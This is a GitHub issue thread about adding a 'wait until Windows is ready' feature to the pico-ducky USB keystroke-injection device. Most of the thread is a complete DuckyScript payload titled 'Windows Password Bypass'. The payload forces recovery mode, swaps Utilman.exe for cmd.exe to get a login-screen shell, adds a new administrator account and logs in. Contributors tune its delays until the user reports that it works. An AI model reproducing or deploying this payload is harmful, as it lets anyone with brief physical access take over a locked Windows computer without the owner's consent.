dbisu/pico-ducky #319: Possible to implement ducky extension on the pico?

truelockmc, 2025-01-20:
Hi, thats not really an issue, just an general question.

Theres an extension for the rubber ducky to start typing when windows is ready for receiving that keystrokes.

Do you know if theres a way to implement that on the pico?  

I want to use it with a script made by @TzurSoffer https://github.com/TzurSoffer/WindowsPasswordBypasser/
that automates the utilman trick.

The Problem is it isnt really efficient, bcs depending on the pc you need to implement a different time buffer.

thx for answering : )

TzurSoffer, 2025-01-21:
I have time later today, I can look into it for you.

TzurSoffer, 2025-01-22:
I added a way to detect once it is plugged in in [this branch](https://github.com/TzurSoffer/pico-ducky-3.0/tree/passiveDetection), I don't think I will PR this since it is not "officially" supported by the ducky-script.
Here is an example of usage:
```txt
PASSIVE_DETECT
GUI r
CTRL a
DELETE
STRINGLN notepad
DELAY 250
STRING Hello World!
```

TzurSoffer, 2025-01-22:
Whether or not this should be included in the mainstream should be left up to @dbisu

truelockmc, 2025-01-22:
@TzurSoffer thats cool, thank you very much : )

Im gonna try it out

truelockmc, 2025-01-22:
Hmm, did i do something wrong? 
When im at the Bluescreen it does nothing.
Heres the Code i used:

    elif line.startswith("WAIT_WINREADY"):
        while True:
            kbd.press(Keycode.CAPS_LOCK)
            kbd.release(Keycode.CAPS_LOCK)
            if kbd.led_on(Keyboard.LED_CAPS_LOCK):
                break
            time.sleep(.1)

Payload.dd:
```
REM Title: Windows Password Bypass
REM Author: Tzur Soffer
REM Description: Break into Windows 10 + 11
REM Target: Windows 10, Windows 11
REM Version: 2.1

DEFINE #ACCOUNT_PASSWORD 1234
DEFINE #ACCOUNT_NAME rubberDucky

REM wait for Windows to accept keystrokes
DELAY 2000

REM get into safe mode
STRING QQQQQQQQQ
CTRL ALT DELETE
DELAY 3000
HOLD SHIFT
TAB
RELEASE SHIFT
ENTER
DELAY 100
UP
DELAY 200

HOLD SHIFT
DELAY 200
HOLD SPACE
DELAY 100
RELEASE SPACE
DELAY 100
ENTER
RELEASE SHIFT

WAIT_WINREADY
REM ADD CMD to login page
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 1000
TAB
DELAY 100
ENTER
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 1000
REM replace utilman.exe with cmd.exe

REM Check each drive from C: to G: for Utilman.exe
STRINGLN @echo off
STRINGLN setlocal enabledelayedexpansion
STRINGLN for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
STRINGLN     if exist %d:\Windows\System32\Utilman.exe (
STRINGLN         echo Utilman.exe found in drive %d:
STRINGLN         cd /d %d:\Windows\System32\
STRINGLN     )
STRINGLN )
STRINGLN copy Utilman.exe  Utilman2.exe /y
STRINGLN copy  cmd.exe  Utilman.exe /y

STRINGLN exit
DELAY 1000
ENTER
WAIT_WINREADY

REM go into shell from login page
STRING QQQQQQQQQ
DELAY 3000
HOLD SHIFT
TAB
DELAY 50
TAB
RELEASE SHIFT
ENTER
DELAY 1000

REM create new admin acount
STRINGLN net user #ACCOUNT_NAME #ACCOUNT_PASSWORD /add
STRINGLN net localgroup administrators #ACCOUNT_NAME /add
STRINGLN shutdown /l
WAIT_WINREADY

REM login to new user
STRING QQQQQQQQQ
DELAY 3000
HOLD SHIFT
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
RELEASE SHIFT
ENTER
DELAY 500
STRINGLN #ACCOUNT_PASSWORD
```

TzurSoffer, 2025-01-22:
You should still add a delay to give windows time to shut off 10 seconds should be good

truelockmc, 2025-01-22:
HOLD SHIFT
DELAY 200
HOLD SPACE
DELAY 100
RELEASE SPACE
DELAY 100
ENTER
RELEASE SHIFT
DELAY 10000

like that?
im gonna try it, thx

TzurSoffer, 2025-01-22:
You should probably also add another delay after the detection to give recovery mode an extra few seconds to load

truelockmc, 2025-01-23:
Ok, it works now, thank you very much : )

closed 2025-01-23 by truelockmc